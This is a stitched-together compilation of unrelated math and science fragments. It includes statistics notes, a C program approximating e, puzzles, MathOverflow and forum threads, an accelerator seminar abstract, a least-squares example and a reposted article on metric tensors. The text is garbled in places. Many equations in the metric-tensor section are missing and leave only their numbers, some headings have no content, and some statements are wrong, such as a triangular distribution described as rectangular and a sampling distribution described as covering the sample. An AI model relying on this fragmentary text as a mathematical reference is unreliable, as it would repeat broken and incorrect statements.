pattern or distribution of a random variable and this description is in terms of a mathematical function. A density curve always sits on or above the horizontal axis and has an area of exactly 1 underneath it. The area under the curve for a given range of values is the probability that the random variable takes on values in that range. We often use density curves to model (or describe) results of random phenomena. 
Probability distributions: a rule, formula or function that tells us which values a random variable can take on and provides us a method to assign probabilities to the values of the random variable Skewness: one side is more spread out than the other- positive/to the right if mean>median Symmetry: no skewness Normal distribution: Normal distributions are defined by two parameters (mean and standard deviation). The mean $$\mu$$ of the distribution determines where the curve is centered and the standard deviation (SD), $$\sigma$$, determines how spread out the distribution is. All normal distributions have the same shape - they are symmetric and bell-shaped 68%-95%-99.7%/ Empirical Rule: It states that if your distribution is bell-shaped and symmetrical then you can expect about 68% of the observations (data) within one standard deviation of the mean ($$\mu$$ ± $$\sigma$$), about 95% of the observations within two standard deviation of the mean ($$\mu$$ ± 2$$\sigma$$) and almost all (about 99.7%) of the observations within three standard deviation of the mean ($$\mu$$ ± 3$$\sigma$$). These percentages are properties of normal distributions. Standard normal distribution: Uniform/Rectangular distribution: The continuous uniform distribution or rectangular distribution is a symmetric probability distribution. A uniformly distributed random variable takes values which are equally probable. Thus, the height of the rectangle for all values of the random variable is constant. Suppose, we like to define a uniform probability distribution over an interval “a” and “b”. The density curve of this uniform random variable will look like: Triangular distribution: The triangular distribution is a symmetric probability distribution. As the name suggests, the shape of the density curve for the rectangular distribution looks like a triangle. To solve problems about a triangular distribution, the key is to sketch the curve and use the formula for area of a triangle to find the required probabilities. Module 8: Sampling Distributions Parameter: characteristics of the population we want to learn about Statistic: the sample version of the parameter Sampling variability or sampling error: not a mistake, it’s a natural consequence of sampling- the difference between the statistic and the parameter it estimates- doesn’t quite represent the whole because the sample is very small- when you take the same sample size with different units you will get a different statistic- this is sampling variability Law of Large Numbers: as the number of observations randomly chosen from a population with finite mean (\mu\) increases, the mean of the observations (\bar{x}\) gets closer and closer to the mean of the population Population Distribution: summarizes the variable values for the whole population Sampling Distribution: summarizes the variable values for the whole sample Central Limit Theorem: when n is large, the sampling distribution of x-bar will be approximately normally distributed with mean mu and standard deviation sigma/ square root n. 
Sampling Distribution of the sample mean: summarizes the values that the sample mean takes on across all the possible SRS’s of the same size from the population Sampling Distribution of the sample proportion: summarizes the values that the sample proportion takes on across all the possible SRS’s of the same size from the population • A few conclusions about the Sampling Distribution of $$\bar{X}$$ in general: In summary, knowing how $$\bar{X}$$ varies from sample to sample provides some insight into how well an $$\bar{x}$$ from a sample will estimate $$\mu$$ which will help us with
|
# 1012.u Calculate e
## Problem
Problem Description
A simple mathematical formula for $e$ is the partial sum $e \approx \sum_{k=0}^{n} \frac{1}{k!}$, where $n$ is allowed to go to infinity.
This can actually yield very accurate approximations of e using relatively small values of n.
Output
Output the approximations of e generated by the above formula for the values of n from 0 to 9. The beginning of your output should appear similar to that shown below.
Sample Output
n e
- -----------
0 1
1 2
2 2.5
3 2.666666667
4 2.708333333
## Solution
#include <stdio.h>

int main(void)
{
    double term, sum;   /* term holds 1/j!, sum accumulates the partial sum */
    int i, j, k;

    printf("n e\n");
    printf("- -----------\n");
    for (i = 0; i <= 9; i++) {          /* partial sums for n = 0..9 */
        sum = 0;
        for (j = 0; j <= i; j++) {      /* add the term 1/j! */
            term = 1;
            for (k = 1; k <= j; k++)
                term = term / k;        /* term becomes 1/j! */
            sum = sum + term;
        }
        /* match the required output precision */
        if (i <= 1)
            printf("%d %.0f\n", i, sum);
        else if (i == 2)
            printf("%d %.1f\n", i, sum);
        else
            printf("%d %.9f\n", i, sum);
    }
    return 0;
}
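The solution above recomputes $1/j!$ from scratch for every term. A sketch of an incremental variant (shown in Python for brevity; not part of the original judge problem) keeps a running term $1/k!$ and updates it with a single division per step:

    def approx_e(n):
        # partial sum of 1/k! for k = 0..n, updating the term incrementally
        total, term = 0.0, 1.0          # term holds 1/k!, starting at 1/0! = 1
        for k in range(n + 1):
            total += term
            term /= (k + 1)             # 1/(k+1)! = (1/k!) / (k+1)
        return total

    for n in range(10):
        print(n, approx_e(n))           # approx_e(9) is about 2.718281526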
|
A conversation in school
Andrei decides to do some random computation in his mind. He starts out with the number $x$. First, he multiplies his number by $3$. Then, he squares his new number. Lastly, he subtracts $8$ times the square of his original number from the new number. His final result is the units digit of $3^{2016}+2(25^{1000})$. When Kostya tries to figure out the original number, he discovers that there are multiple answers. Andrei then tells Kostya that his starting number was his date of birth (Kostya did not know it). What number did Andrei start with?
|
# In search for isotropic graphs: Straight lines and parallels

Asked by Hans Stricker on MathOverflow (question 46930), 2010-11-22.

I wonder why I can find only so few attempts at concisely defining "directions" and "isotropy" of graphs.

In Euclidean spaces, "directions" can be identified with equivalence classes of parallel straight lines, and definitions of "isotropy" and "anisotropy" normally rely on directions.

I believe it's easy to define a "straight line" in a graph:

**Definition 1:** Let $x$ be *straightly connected* to $y$ iff there is a unique (!) shortest path between vertices $x$ and $y$ of finite length. A *straight line* then is a maximal set of pairwise straightly connected vertices.

Before I try to define parallelity, I want to temporarily restrict the examination to infinite planar graphs whose faces tile the plane (*planar tiling graphs* for short), because these are the graphs I finally have in mind. By doing so, a straight line is additionally assumed to be infinite.

Parallelity cannot be defined so unambiguously. Two definitions come to mind:

**Definition 2.1:** Let two straight lines $l_1$ and $l_2$ be *weakly parallel* iff they have no vertex in common.

(This definition will definitely only make sense for planar graphs.)

**Definition 2.2:** Let two straight lines $l_1$ and $l_2$ be *strongly parallel* iff there is a bijection $\pi$ from $l_1$ to $l_2$ such that $x$ and $\pi(x)$ have equal distance for all $x \in l_1$.

A litmus test for a good definition of "straight lines" and "parallels" might be whether a planar (tiling) graph can always be drawn such that straight graph lines are mapped onto straight geometric lines and parallel graph lines onto parallel geometric lines.

**Question 1:** Can it be seen at a glance whether the definitions above pass this litmus test?

**Question 2:** Are there known equivalent definitions (with different terminology only)?

**Question 3:** Are there known *other* definitions in the same spirit?

**Question 4:** Are there interesting results involving such definitions and maybe regularity and/or symmetry?

## Answer by Joseph O'Rourke

Perhaps it will help to explore the world of *pseudoline arrangements*. A *pseudoline* is a simple curve in the projective plane that is topologically a line. Each pair of pseudolines in an arrangement meets at most once. The analog of "every two points determine a line" is the *Levi Enlargement Lemma*: for every two distinct points not on the same pseudoline in an arrangement, there is a pseudoline passing through those two points that enlarges the arrangement. The natural graphs associated with pseudoline arrangements have been studied. I believe they correspond to your "infinite planar graphs whose faces tile the plane."

Although pseudolines are mentioned in the Wikipedia article on arrangements of lines (http://en.wikipedia.org/wiki/Arrangement_of_lines), a more definitive exposition can be found in the article by Jacob E. Goodman, "Pseudoline arrangements," Chapter 5 in the *Handbook of Discrete and Computational Geometry* (CRC, 2004). Another good source is the paper by Pankaj Agarwal and Micha Sharir, "Pseudo-line arrangements: duality, algorithms, and applications," *Proceedings of the 13th ACM-SIAM Symposium on Discrete Algorithms*, 2002.
|
# Geometry - Area of Siamese Triangles
How can I find the area of this figure?
It is quite curious because it is a particular case of a sequence of such figures.
Does anyone know how to find the area of this sequence as a function of the number of segments?
Suppose you are looking at the shape given by the lines $L_{x,y}$ linking $(x,0)$ to $(0,y)$ when $x+y=n$ (your examples are $n=3$ and $n=8$). For $0\le k < n$, call $(x_k,y_k)$ the intersection of $L_{n-k,k}$ with $L_{n-k-1,k+1}$. A few calculations show that $(x_k,y_k) = (\frac{(n-k)(n-k-1)}n,\frac {k(k+1)}n)$
Then, decompose your shape into $n-1$ triangles of base $1$ and height $y_k$: the total area is then $\frac 1 2 \sum_{k=1}^{n-1} \frac {k(k+1)}n = \frac {(n+1)n(n-1)}{6n} = \frac{n^2-1}6$
Write the points as Cartesian coordinates. So $O=(0,0)$, $A=(0,2k)$, $B=(2k,0)$, and $D$, the point where the two hypotenuses meet (solving the two equations $2y+x = 2k$ and $y+2x=2k$), is $(\frac{2k}{3},\frac{2k}{3})$.
The two triangles, $ODA$ and $ODB$ are congruent, so the total area is twice the area of $ODA$. But that's just the area of the parallelogram, $O,D,A,D+A$, which, if you remember your linear algebra, is just the determinant, $\frac{2k}{3}2k - \frac{2k}{3}0 = \frac{4k^2}{3}$
The more general solution is $n(n+2)/6$ where $n=2$ in your first example, and $n=7$ in your second.
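A quick numeric check of the first answer's triangle decomposition against the closed form $(n^2-1)/6$ (a sketch in Python using exact rationals; not from the original thread):

    from fractions import Fraction

    def area(n):
        # n-1 triangles of base 1 and heights y_k = k(k+1)/n, k = 1..n-1
        return sum(Fraction(k * (k + 1), n) for k in range(1, n)) / 2

    for n in (3, 8, 100):
        assert area(n) == Fraction(n * n - 1, 6)
    print(area(3), area(8))     # 4/3 and 21/2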
|
anonymous (4 years ago): Evaluating an integral, something like:
1. anonymous
As long as $f(x)$ is continuous and differentiable, for $\int\limits_{- \infty}^{\infty}f(x)\,dx$, is there ever a time we would not choose $0$ as $c$ in $\int\limits_{- \infty}^{c} f(x)\, dx + \int\limits_{c}^{\infty} f(x)\, dx$?
2. anonymous
It's possible that a function is not differentiable at multiple points. Then you would continue to break it up like you've shown above and take the limit wherever it is discontinuous.
3. lgbasallote
improper integrals huh
4. anonymous
OK, thanks, that's what I was thinking!
5. lgbasallote
You can choose 1 as $c$, or whatever... as long as it's within $-\infty$ and $+\infty$.
|
Accelerator Seminar
# Stephan Reimann, "Re-Commissioning Strategy for GSI after the major Shutdown"
Thursday, November 9, 2017 (Europe/Berlin)
at KBW (Lecture Hall)
Description: In July 2016, the longest shutdown period in GSI history began. Besides the extensive maintenance and upgrade measures, the main work package is the civil construction project GAF (GSI Anbindung an FAIR, the link of GSI to FAIR), which comprises additional shielding of SIS18 and fire protection measures, as well as the connection of the new beam line between FAIR and the existing GSI facility. At the UNILAC, the modernization of the post-stripper RF system and the refurbishment of the HVAC (heating, ventilation and air conditioning) system have been started. In addition to these measures, the complete control-system stack for SIS18, the ESR and the HEST will be replaced by the FAIR system. Presently, all accelerators are far from being operational (except the CRYRING). Nevertheless, we decided to provide a comprehensive user beam time already in 2018. During the shutdown we follow a detailed and ambitious schedule to bring our accelerator facility back online in time. The challenges and our re-commissioning strategy will be presented in this talk.
|
# Is there a name for this function?
This should be simple.
A polynomial could be defined as $$P_n (x) = \sum_{i=1}^{n} a_i x^{i-1}$$
Would the infinite-dimensional version of that, $$F_l (x) = \int_{0}^{l} a(y)\, x^y\, dy,$$ already have a name that everybody but me knows?
-
Your function is not really a generalization of a polynomial, since the exponent is not a natural number; a better generalization might be $\sum_{n=0}^\infty a_nx^n$, which is the very well-known and important concept of a power series. – Gadi A May 5 '11 at 9:04
Well, it is not a polynomial, that's true. But I think there is a certain similarity. – etorri May 5 '11 at 9:31
Indeed; I just wanted to point out another, maybe more "in the spirit of polynomials", possible generalization. – Gadi A May 5 '11 at 10:23
You may have a look at the Mellin transform and its inverse: en.wikipedia.org/wiki/Mellin_transform – Dirk May 5 '11 at 11:42
With the substitution $x=e^{i\omega}$ it is known as the Fourier transform.
Or the substitution $x = e^{-s}$, with $l = \infty$, gives the Laplace transform... – sos440 May 5 '11 at 9:34
Yes, just as the polynomial case would be a discrete Fourier transform or spectral decomposition. – etorri May 5 '11 at 9:38
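A small numeric sanity check of that substitution (a sketch assuming Python with SciPy; the coefficient function $a(y)=\cos y$ and the parameters are arbitrary choices): with $x = e^{-s}$, $F_l(x)$ coincides with the Laplace transform of $a$ truncated to $[0,l]$.

    import numpy as np
    from scipy.integrate import quad

    a = lambda y: np.cos(y)     # arbitrary coefficient function
    l, s = 5.0, 0.7
    x = np.exp(-s)

    F = quad(lambda y: a(y) * x**y, 0, l)[0]            # F_l(x)
    L = quad(lambda y: a(y) * np.exp(-s * y), 0, l)[0]  # truncated Laplace transform
    assert abs(F - L) < 1e-12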
|
Maybe you need to re-assign the result to the list: LM = Append[LM, m]. (If this solves the problem, don't feel bad... you don't want to know how many hours I spent looking for similar mistakes.) Also, if the whole body of your module is a single If-statement, what do you need the Module for? You can just as well write For[..., ..., LM = Append[LM, If[...]]] instead of For[..., ..., Module[{m = If[...]}, LM = Append[LM, m]]].
|
# Calculate how long it will take for the ice to melt?
1. Sep 19, 2011
### klilly
1. The problem statement, all variables and given/known data
A chilly bin has walls 5.90 cm thick, and the total area of the walls is 0.700 m$^2$. The chilly bin is loaded with 2.00 kg of ice at 0.00 °C and stood on a rack so that its entire surface is in contact with the air. The temperature on the outside of the chilly bin is 28.0 °C. If the chilly bin is made of styrofoam ($k_{\text{styrofoam}} = 0.0100$ J s$^{-1}$ m$^{-1}$ °C$^{-1}$), how many hours will it take to melt all of the ice?
(Note: $L_{f,\text{water}} = 3.35 \times 10^{5}$ J kg$^{-1}$)
2. Relevant equations
I was given $t = \dfrac{L_{f}\, m_{\text{water}}}{kA\,(\Delta T / \Delta x)}$,
but it didn't work out right.
3. The attempt at a solution
I have no idea how to get to this :(
2. Sep 19, 2011
### issacnewton
Re: Calculate how long it will take for the ice to melt??
law of thermal conduction says
$$\mathcal{P}=kA\;\frac{\Delta T}{\Delta x}$$
where P is the power transferred, k is thermal conductivity, A is the area of the surface through which energy will flow, $\frac{\Delta T}{\Delta x}$ is temperature gradient.
$\Delta T$ is the temperature difference between inner and outer surface,
$\Delta x$ is the thickness of the bin.
now we have been given , for chilly bin (made out of styrofoam)
$k = 0.0100$ J s$^{-1}$ m$^{-1}$ °C$^{-1}$
$A = 0.700$ m$^2$
$\Delta T = 28 - 0 = 28$ °C
$\Delta x = 5.90 \times 10^{-2}$ m
Using this you can find the power which transfers from the outside to the inside, where the ice is stored: $\mathcal{P} = 3.322$ J s$^{-1}$ = 3.322 W.
Now, the amount of energy required to melt $m$ kg of ice is
$$Q=m_{ice}L_f$$
$m_{\text{ice}} = 2$ kg; $L_f = 3.35 \times 10^{5}$ J kg$^{-1}$,
so we get $Q = 6.7 \times 10^{5}$ J.
If $t$ is the time required to melt all the ice, then $Q$ must equal $\mathcal{P} \times t$. Solving for $t$ gives $t = Q/\mathcal{P} \approx 2.0 \times 10^{5}$ s, which is about 56 hours.
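The arithmetic can be checked with a few lines (a sketch, not from the original thread; Python assumed):

    k, A = 0.0100, 0.700          # W m^-1 C^-1 and m^2
    dT, dx = 28.0, 5.90e-2        # temperature difference (C) and wall thickness (m)
    P = k * A * dT / dx           # conducted power, about 3.322 W

    m, Lf = 2.00, 3.35e5          # kg and J/kg
    Q = m * Lf                    # energy needed to melt the ice, 6.7e5 J

    print(round(P, 3), round(Q / P / 3600, 1))   # 3.322 W and about 56.0 hours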
|
# Loading page in WPF
I have a basic WPF application. It contains App.xaml, as always, and a MainWindow.xaml. I've also created some pages, like Page1/2/3. I want to load, for example, Page1.xaml inside MainWindow.xaml. Is this possible? I also want to be able to close it so that the content of MainWindow.xaml stays there.
I don't want this to be a navigation application with the left/right arrows at the top.
## 3 Answers
You can add a Frame to your main page and load the pages into it.
I came here to add that there are many ways to load the pages into the frame:
By setting the source (as @Shift mentioned)
frame1.Source = new Uri("Page1.xaml", UriKind.RelativeOrAbsolute);
By setting the Content:
frame1.Content= new Page1();
By using the NavigationService:
frame1.NavigationService.Navigate(new Page1());
Adding a frame and setting the source for the frame like this made my day :)
frame1.Source = new Uri("Page1.xaml", UriKind.RelativeOrAbsolute);
|
Example: Method of Least Squares
This example explains how to find the equation of a straight line, the least-squares line, using the method of least squares, which is very useful in statistics as well as in mathematics.
Example:
Fit a least square line for the following data. Also find the trend values and show that $\sum \left( {Y – \widehat Y} \right) = 0$.
| $X$ | 1 | 2 | 3 | 4 | 5 |
|---|---|---|---|---|---|
| $Y$ | 2 | 5 | 3 | 8 | 7 |
Solution:
| $X$ | $Y$ | $XY$ | $X^2$ | $\widehat Y = 1.1 + 1.3X$ | $Y - \widehat Y$ |
|---|---|---|---|---|---|
| 1 | 2 | 2 | 1 | 2.4 | $-0.4$ |
| 2 | 5 | 10 | 4 | 3.7 | $+1.3$ |
| 3 | 3 | 9 | 9 | 5.0 | $-2.0$ |
| 4 | 8 | 32 | 16 | 6.3 | $+1.7$ |
| 5 | 7 | 35 | 25 | 7.6 | $-0.6$ |
| $\sum X = 15$ | $\sum Y = 25$ | $\sum XY = 88$ | $\sum X^2 = 55$ | (trend values) | $\sum(Y - \widehat Y) = 0$ |
The equation of the least-squares line is $Y = a + bX$.

Normal equation for $a$: $\sum Y = na + b\sum X$, i.e. $25 = 5a + 15b$ (1)

Normal equation for $b$: $\sum XY = a\sum X + b\sum {X^2}$, i.e. $88 = 15a + 55b$ (2)

To eliminate $a$ from equations (1) and (2), multiply equation (1) by 3 and subtract the result from equation (2). Thus we get the values of $a$ and $b$.
Here $a = 1.1$ and $b = 1.3$, the equation of least square line becomes $Y = 1.1 + 1.3X$.
For the trends values, put the values of $X$ in the above equation (see column 4 in the table above).
|
Question: Error in columns(org.Hs.eg.db) : could not find function "columns"

Sanches0 wrote:
Hi all,
I have been running an analysis of microarray data, and when I try to run the line "columns(org.Hs.eg.db)", I get an error. Could anyone please help me understand this problem?
source("https://bioconductor.org/biocLite.R")
install.packages("org.Hs.eg.db", repos="http://bioconductor.org/packages/3.1/data/annotation")
biocLite("org.Hs.eg.db")
biocLite("hgu95av2.db")
biocLite("tidyverse")
columns(org.Hs.eg.db)
keytypes(org.Hs.eg.db)
James W. MacDonald wrote:
There are two problems here. First, don't do this:
install.packages("org.Hs.eg.db", repos="http://bioconductor.org/packages/3.1/data/annotation")
The whole idea behind biocLite is that you don't need to figure out what repository to use, particularly since Bioconductor package versions are specific to a given R version. By hijacking the process like that you are taking the chance that you will install the wrong thing.
Second, you have to load a package before you can use it.
> columns(org.Hs.eg.db)
Error in columns(org.Hs.eg.db) : could not find function "columns"
> library(org.Hs.eg.db)
<snip>
> columns(org.Hs.eg.db)
[1] "ACCNUM" "ALIAS" "ENSEMBL" "ENSEMBLPROT" "ENSEMBLTRANS"
[6] "ENTREZID" "ENZYME" "EVIDENCE" "EVIDENCEALL" "GENENAME"
[11] "GO" "GOALL" "IPI" "MAP" "OMIM"
[16] "ONTOLOGY" "ONTOLOGYALL" "PATH" "PFAM" "PMID"
[21] "PROSITE" "REFSEQ" "SYMBOL" "UCSCKG" "UNIGENE"
[26] "UNIPROT"
Hi James,
I have found out the problem. Everything went well when I loaded the biomaRt package.
Thanks
|
# Constructing a family of convergents from continued fractions formed by a set of prime partial quotients
For a given real number $x$, the continued fraction representation $x = [a_0; a_1, a_2, \cdots]$, where $(a_n)_{n \geq 0}$ is defined by setting $x = \alpha_0$, then $a_i = \lfloor \alpha_i \rfloor$ and $\alpha_{i+1} = \frac{1}{\alpha_i - a_i}$ for $i \geq 0$. A convergent of $x$ is a rational number $p_n/q_n$ where $p_n/q_n = [a_0; a_1, \cdots, a_n]$ and $\gcd(p_n, q_n) = 1$.

My question is as follows. Is there a set $\mathcal{A} \subset \mathcal{P}$, where $\mathcal{P}$ denotes the set of prime numbers, and the set $\mathfrak{C}_\mathcal{A}$ of real numbers $x \in [0,1]$ with $x = [0; a_1, a_2, \cdots]$ such that $a_i \in \mathcal{A}$ for all $i \geq 1$, with the property that there exist infinitely many pairs of primes $p < q$ such that $p/q$ is a convergent of some element $x \in \mathfrak{C}_\mathcal{A}$?
The question is of interest because of the following 'additive' property of continued fractions:
$$\displaystyle \frac{1}{a + \frac{b}{d}} = \frac{d}{b + ad}$$
which implies that if $p/q$ is a convergent in $\mathfrak{C}_\mathcal{A}$ then so is $q/(p + aq)$. This is interesting because Zaremba's conjecture asserts that for a finite set of the form $\mathcal{B} = \{1, 2, \cdots, B\}$ with $B \geq 5$, the set $\mathfrak{D}_\mathcal{B}$ of those denominators $d$ that appear as the denominator of a fraction $b/d$ which is a convergent of some number $z$ whose partial quotients all lie in $\mathcal{B}$ should contain all but finitely many positive integers. If this hypothesis can be relaxed to a set of primes, then one can show that almost all positive integers can be written as the sum $p + aq$, where $a$ is from a finite family of primes, which would greatly strengthen Chen's theorem and be ever so close to the vaunted Goldbach conjecture.
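For concreteness, the convergents $p_n/q_n$ can be generated from the partial quotients with the standard recurrence $p_n = a_n p_{n-1} + p_{n-2}$, $q_n = a_n q_{n-1} + q_{n-2}$ (a sketch in Python; the prime alphabet $\{2,3\}$ below is just an illustration, not a claim about the question):

    from fractions import Fraction

    def convergents(a):
        # p_{-1}/q_{-1} = 1/0, p_0/q_0 = a_0/1, then the usual recurrence
        p_prev, q_prev, p, q = 1, 0, a[0], 1
        out = [Fraction(p, q)]
        for ak in a[1:]:
            p_prev, p = p, ak * p + p_prev
            q_prev, q = q, ak * q + q_prev
            out.append(Fraction(p, q))
        return out

    print(convergents([0, 2, 3, 2, 3]))     # [0, 1/2, 3/7, 7/16, 24/55]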
## 1 Answer
This is only half an answer. For almost all real $x$ we have an asymptotic formula for convergents with prime denominators; see Bykovskii, "On the distribution of prime denominators of the approximants for almost all real numbers." Probably we should sieve one more time.
|
# Changes between Version 4 and Version 5 of udg/ecoms/RPackage/examples/continentalSelection
Timestamp: Feb 20, 2014 3:10:57 PM
Comment:
--
Changes from v4 to v5:

= Alternative visualization tools: Monsoon in the Indian subcontinent

So far we have shown plotting examples using the trellis plots generated by the spplot method. In this example we show alternative plotting options using more standard R plotting functions for gridded data. To this aim, we load the precipitation data of 1997 for the lead month 1 forecast over the Indian subcontinent, considering the monsoon season from June to September.

[[Image(contour.png)]]

== filled.contour function

filled.contour produces a nice output with a graduated colorbar, but placing lines or other elements on the plot is not straightforward...

[[Image(filled_contour.png)]]
|
## Knowledge: Confluent Hypergeometric Functions

Mathematica provides several kinds of confluent hypergeometric functions, including Hypergeometric0F1, Hypergeometric1F1, HypergeometricU, and their regularized variants.
## Metric Tensor [reposted]
Roughly speaking, the metric tensor is a function which tells how to compute the distance between any two points in a given space. Its components can be viewed as multiplication factors which must be placed in front of the differential displacements $dx_i$ in a generalized Pythagorean theorem:

$$ds^2 = g_{11}\,dx_1^2 + g_{12}\,dx_1\,dx_2 + g_{22}\,dx_2^2 + \cdots \qquad (1)$$

In Euclidean space, $g_{ij} = \delta_{ij}$, where $\delta_{ij}$ is the Kronecker delta (which is 0 for $i \neq j$ and 1 for $i = j$), reproducing the usual form of the Pythagorean theorem

$$ds^2 = dx_1^2 + dx_2^2 + \cdots \qquad (2)$$
In this way, the metric tensor can be thought of as a tool by which geometrical characteristics of a space can be “arithmetized” by way of introducing a sort of generalized coordinate system (Borisenko and Tarapov 1979).
In the above simplification, the space in question is most often a smooth manifold $M$, whereby a metric tensor is essentially a geometrical object $g$ taking two vector inputs and calculating either the squared length $g(v,v)$ of a single vector $v$ or a scalar product $g(u,v)$ of two different vectors (Misner et al. 1978). In this analogy, the inputs in question are most commonly tangent vectors lying in the tangent space $T_pM$ for some point $p$, a fact which facilitates the more common definition of metric tensor as an assignment of differentiable inner products to the collection of all tangent spaces of a differentiable manifold (O'Neill 1967). For this reason, some literature defines a metric tensor on a differentiable manifold to be nothing more than a symmetric non-degenerate bilinear form (Dodson and Poston 1991).
An equivalent definition can be stated using the language of tensor fields and indices thereon. Along these lines, some literature defines a metric tensor to be a symmetric $(0,2)$ tensor field $g$ on a smooth manifold $M$ so that, for all $x \in M$, $g_x$ is non-degenerate and $\operatorname{ind}(g_x) = r$ for some nonnegative integer $r$ (Sachs and Wu 1977). Here, $r$ is called the index of $g$ and the expression $\operatorname{ind}(g_x)$ refers to the index of the respective quadratic form. This definition seems to occur less commonly than those stated above.
Metric tensors have a number of synonyms across the literature. In particular, metric tensors are sometimes called fundamental tensors (Fleisch 2012) or geometric structures (O'Neill 1967). Manifolds endowed with metric tensors are sometimes called geometric manifolds (O'Neill 1967), while a pair $(V, g)$ consisting of a real vector space $V$ and a metric tensor $g$ is called a metric vector space (Dodson and Poston 1991). Symbolically, metric tensors are most often denoted by $g$ or $g_{ij}$, although other notations are also used in O'Neill (1967), Fleisch (2012), and Dodson and Poston (1991).
When defined as a differentiable inner product of every tangent space of a differentiable manifold $M$, the inner product associated to a metric tensor is most often assumed to be symmetric, non-degenerate, and bilinear, i.e., it is most often assumed to take two vectors $v, w$ as arguments and to produce a real number $g(v,w)$ such that

$$g(v,w) = g(w,v) \qquad (3)$$

$$g(av_1 + bv_2, w) = a\,g(v_1,w) + b\,g(v_2,w) \qquad (4)$$

$$g(v, aw_1 + bw_2) = a\,g(v,w_1) + b\,g(v,w_2) \qquad (5)$$

$$g(v,w) = 0 \ \text{for all } w \ \text{if and only if} \ v = 0 \qquad (6)$$

Note, however, that the inner product need not be positive definite, i.e., the condition

$$g(v,v) \ge 0 \qquad (7)$$

with equality if and only if $v = 0$ need not always be satisfied. When the metric tensor is positive definite, it is called a Riemannian metric or, more precisely, a weak Riemannian metric; otherwise, it is called non-Riemannian, (weak) pseudo-Riemannian, or semi-Riemannian, though the latter two terms are sometimes used differently in different contexts. The simplest example of a Riemannian metric is the Euclidean metric discussed above; the simplest example of a non-Riemannian metric is the Minkowski metric of special relativity, the four-dimensional version of the more general metric of signature $(1, n-1)$ which induces the standard Lorentzian inner product on $n$-dimensional Lorentzian space. In some literature, the condition of non-degeneracy is varied to include either weak or strong non-degeneracy (Marsden et al. 2002); one may also consider metric tensors whose associated quadratic forms fail to be symmetric, though this is far less common.
In coordinate notation (with respect to a chosen basis), the metric tensor $g_{\mu\nu}$ and its inverse $g^{\mu\nu}$ satisfy a number of fundamental identities, e.g.
(8)
(9)
and
(10)
where $g$ is the matrix of metric coefficients. One example of these identities comes from special relativity, where $\eta_{\mu\nu}$ is the matrix of metric coefficients for the Minkowski metric of signature $(1,3)$, i.e.

$$\eta_{\mu\nu} = \operatorname{diag}(1, -1, -1, -1) \qquad (11)$$

Generally speaking, identities (8), (9), and (10) can be succinctly written as
(12)
where
(13) (14)
What’s more,
(15)
gives
(16)
and hence yields a quantitative relationship between a metric tensor and its inverse.
In the event that the metric is positive definite, the metric discriminants are positive. For a metric in two-space, this fact can be expressed quantitatively by the inequality

$$g = g_{11}\,g_{22} - g_{12}\,g_{21} > 0 \qquad (17)$$
The orthogonality of contravariant and covariant metrics stipulated by

$$g^{ik}\,g_{kj} = \delta^i_j \qquad (18)$$

for $i, j = 1, \ldots, n$ gives $n^2$ linear equations relating the quantities $g_{ij}$ and $g^{ij}$. Therefore, if the components of one of the two metrics are known, the components of the other can be determined, a fact summarized by saying that the existence of metric tensors gives a geometrical way of changing from contravariant tensors to covariant ones and vice versa (Dodson and Poston 1991).
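A quick numerical illustration of this orthogonality and of index raising in two-space (a sketch with an arbitrarily chosen symmetric positive-definite metric):

```python
import numpy as np

g = np.array([[2.0, 0.5],
              [0.5, 1.0]])                 # covariant metric g_ij (symmetric, positive definite)
g_inv = np.linalg.inv(g)                   # contravariant metric g^ij

print(np.allclose(g_inv @ g, np.eye(2)))   # True: g^{ik} g_{kj} = delta^i_j

v_cov = np.array([1.0, 2.0])               # covariant components v_j
v_con = g_inv @ v_cov                      # raised index: v^i = g^{ij} v_j
print(v_con)
```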
In two-space,

$$g^{11} = \frac{g_{22}}{g} \qquad (19)$$

$$g^{12} = -\frac{g_{12}}{g}, \quad g^{21} = -\frac{g_{21}}{g} \qquad (20)$$

$$g^{22} = \frac{g_{11}}{g} \qquad (21)$$

Therefore, if $g_{ij}$ is symmetric,

$$g_{12} = g_{21} \qquad (22)$$

$$g^{12} = g^{21} \qquad (23)$$

In any symmetric space (e.g., in Euclidean space), the off-diagonal components vanish,

$$g_{12} = g_{21} = 0 \qquad (24)$$

and so

$$g^{11} = \frac{1}{g_{11}}, \quad g^{22} = \frac{1}{g_{22}} \qquad (25)$$
The angle $\theta$ between two parametric curves with tangent vectors $u$ and $v$ is given by

$$\cos\theta = \frac{g_{ij}\,u^i v^j}{\sqrt{g_{kl}\,u^k u^l}\,\sqrt{g_{mn}\,v^m v^n}} \qquad (26)$$
so
(27)
and
(28)
In arbitrary (finite) dimension, the line element can be written

$$ds^2 = g_{ij}\,dx^i\,dx^j \qquad (29)$$

where Einstein summation has been used. In three dimensions, this yields

$$ds^2 = g_{11}\,(dx^1)^2 + g_{12}\,dx^1 dx^2 + g_{13}\,dx^1 dx^3 + g_{21}\,dx^2 dx^1 + g_{22}\,(dx^2)^2 + g_{23}\,dx^2 dx^3 + g_{31}\,dx^3 dx^1 + g_{32}\,dx^3 dx^2 + g_{33}\,(dx^3)^2 \qquad (30)$$
and so it follows that the metric tensor in three-space can be written as

$$g = \begin{pmatrix} g_{11} & g_{12} & g_{13} \\ g_{21} & g_{22} & g_{23} \\ g_{31} & g_{32} & g_{33} \end{pmatrix} \qquad (31)$$
Moreover, because $g_{ij} = 0$ for $i \neq j$ when working with respect to orthogonal coordinate systems, the line element for three-space becomes

$$ds^2 = g_{11}\,(dx^1)^2 + g_{22}\,(dx^2)^2 + g_{33}\,(dx^3)^2 \qquad (32)$$

$$= (h_1\,dx^1)^2 + (h_2\,dx^2)^2 + (h_3\,dx^3)^2 \qquad (33)$$

where $h_i = \sqrt{g_{ii}}$ are called the scale factors. Many of these notions can be generalized to higher dimensions and to more general contexts.
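As an illustration of the scale-factor formalism, the following sketch computes the induced metric $g_{ij} = J^T J$ of spherical coordinates from the Jacobian of the embedding and recovers $h_r = 1$, $h_\theta = r$, $h_\phi = r\sin\theta$ (any computer algebra system would do; SymPy is used here for concreteness):

```python
import sympy as sp

r, theta, phi = sp.symbols('r theta phi', positive=True)

# Embedding of spherical coordinates into Euclidean 3-space
X = sp.Matrix([r*sp.sin(theta)*sp.cos(phi),
               r*sp.sin(theta)*sp.sin(phi),
               r*sp.cos(theta)])
q = sp.Matrix([r, theta, phi])

J = X.jacobian(q)                # Jacobian of the embedding
g = sp.simplify(J.T * J)         # induced metric tensor g_ij
print(g)                         # diag(1, r**2, r**2*sin(theta)**2)

# Scale factors h_i = sqrt(g_ii); h_phi simplifies to r*sin(theta) on 0 < theta < pi
h = [sp.sqrt(g[i, i]) for i in range(3)]
print(h)
```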
## Software for tensor calculations
